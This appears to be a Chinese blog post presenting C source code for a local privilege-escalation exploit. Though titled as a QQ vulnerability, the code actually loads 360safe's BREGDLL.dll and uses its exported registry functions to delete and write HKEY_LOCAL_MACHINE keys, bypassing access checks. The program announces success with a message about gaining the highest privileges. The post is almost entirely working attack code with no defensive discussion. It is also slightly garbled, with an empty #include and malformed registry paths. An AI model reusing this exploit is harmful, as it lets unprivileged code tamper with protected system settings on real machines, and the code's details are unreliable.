QQ本地提权漏洞

后门利用程序

  #include

  typedef BOOL (WINAPI *INIT_REG_ENGINE)();

  typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);

  typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);

  typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);

  typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

  BREG_DELETE_KEY BRegDeleteKey = NULL;

  BREG_OPEN_KEY BRegOpenKey = NULL;

  BREG_CLOSE_KEY BRegCloseKey = NULL;

  REG_SET_VALUE_EX BRegSetValueEx = NULL;

  #define AppPath "Software//Microsoft//Windows//CurrentVersion//App Paths//360safe.exe"

  #define TestDeleteKey HKEY_LOCAL_MACHINE

  #define TestDeleteRegPath "Software//360Safe//Update"

  #define TestSetKey HKEY_LOCAL_MACHINE

  #define TestSetPath "Software//360Safe"

  BOOL InitBRegDll()

  {

  LONG lResult;

  HKEY hKey;

  CHAR cPath[MAX_PATH + 32] = { 0 };

  DWORD dwPathLen = MAX_PATH;

  lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);

  if (FAILED(lResult))

  return FALSE;

  DWORD dwType = REG_SZ;

  lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);

  RegCloseKey(hKey);

  if (FAILED(lResult))

  return FALSE;

  strcat(cPath, "//deepscan//BREGDLL.dll");

  HMODULE modBReg = LoadLibraryA(cPath);

  if (!modBReg)

  return FALSE;

  INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");

  BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");

  BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");

  BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");

  BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

  if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {

  FreeLibrary(modBReg);

  return FALSE;

  }

  if (!InitRegEngine()) {

  FreeLibrary(modBReg);

  return FALSE;

  }

  return TRUE;

  }

  LONG TestSetRegKey()

  {

  HKEY hKey;

  LONG lResult;

  lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);

  if (FAILED(lResult))

  return lResult;

  DWORD dwType = REG_SZ;

  static char szData[] = "TEST VALUE";

  lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));

  BRegCloseKey(hKey);

  return lResult;

  }

  int main(int argc, char *argv[])

  {

  if (!InitBRegDll()) {

  MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);

  return 1;

  }

  if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {

  MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);

  return 2;

  }

  if (FAILED(TestSetRegKey())) {

  MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);

  return 3;

  }

  MessageBoxA(NULL, "突破系统安全检查,获得最高权限,漏洞利用成功!", "成功", MB_OK);

  return 0;

  }
 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值